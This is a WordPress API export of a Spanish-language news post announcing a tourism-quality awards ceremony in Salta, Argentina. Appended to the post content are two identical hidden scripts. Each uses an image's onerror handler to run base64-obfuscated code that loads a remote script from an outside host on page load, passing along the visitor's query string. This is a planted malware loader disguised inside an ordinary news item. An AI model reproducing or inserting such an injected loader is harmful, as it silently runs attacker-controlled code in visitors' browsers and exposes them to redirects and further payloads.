{"id":2183,"date":"2023-02-06T13:08:06","date_gmt":"2023-02-06T16:08:06","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2183"},"modified":"2025-08-14T00:23:51","modified_gmt":"2025-08-14T03:23:51","slug":"se-realizara-manana-el-acto-de-entrega-de-distinciones-del-programa-calidad-turistica-2022","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2183","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/se-realizara-maniana-el-acto-de-entrega-de-distinciones-del-programa-calidad-turistica-2022-87699\">Se realizar\u00e1 ma\u00f1ana el acto de entrega de distinciones del Programa Calidad Tur\u00edstica 2022<\/a>"},"content":{"rendered":"\n<h3 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#896709\"><em>Ser\u00e1 a partir de las 9:30 en el Centro Cultural Am\u00e9rica, sito en Mitre 23. Estar\u00e1n presentes el ministro de Turismo y Deportes, Mario Pe\u00f1a y el Director Nacional de Calidad e Innovaci\u00f3n Tur\u00edstica, Hern\u00e1n Roitman.<\/em><\/h3>\n\n\n\n<p>En el marco del Programa de Calidad Tur\u00edstica 2022, el Ministerio de Turismo y Deportes de Salta distinguir\u00e1 a aquellos Organismos Municipales que trabajaron y se comprometieron en potenciar sus herramientas de comunicaci\u00f3n para la promoci\u00f3n del destino y en fortalecer sus Centros de Atenci\u00f3n al Visitante.<\/p>\n\n\n\n<p>El acto, que ser\u00e1 precedido por el autoridades del Ministerio de Turismo y Deportes provincial y el Director Nacional de Calidad e Innovaci\u00f3n Tur\u00edstica, Hern\u00e1n Roitman; se llevar\u00e1 adelante ma\u00f1ana martes 7 de febrero a partir de las 9:30 en el Centro Cultural Am\u00e9rica.<\/p>\n\n\n\n<p>En la oportunidad adem\u00e1s se entregar\u00e1 una distinci\u00f3n especial a aquellos actores del sector privado que implementan las Directrices Bases para la Gesti\u00f3n Integral de Municipios Tur\u00edsticos Sostenibles y las Directrices de Competitividad Tur\u00edstica &nbsp;y Sello CocinAR \u2013 Cocina Argentina.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/se-realizara-maniana-el-acto-de-entrega-de-distinciones-del-programa-calidad-turistica-2022-87699\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ser\u00e1 a partir de las 9:30 en el Centro Cultural Am\u00e9rica, sito en Mitre 23. Estar\u00e1n presentes el ministro de Turismo y Deportes, Mario Pe\u00f1a y el Director Nacional de Calidad e Innovaci\u00f3n Tur\u00edstica, Hern\u00e1n Roitman. En el marco del Programa de Calidad Tur\u00edstica 2022, el Ministerio de Turismo y Deportes de Salta distinguir\u00e1 a [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2184,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15],"tags":[],"class_list":{"0":"post-2183","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2183"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2183"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2183\/revisions"}],"predecessor-version":[{"id":7184,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2183\/revisions\/7184"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2184"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2183"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2183"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2183"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}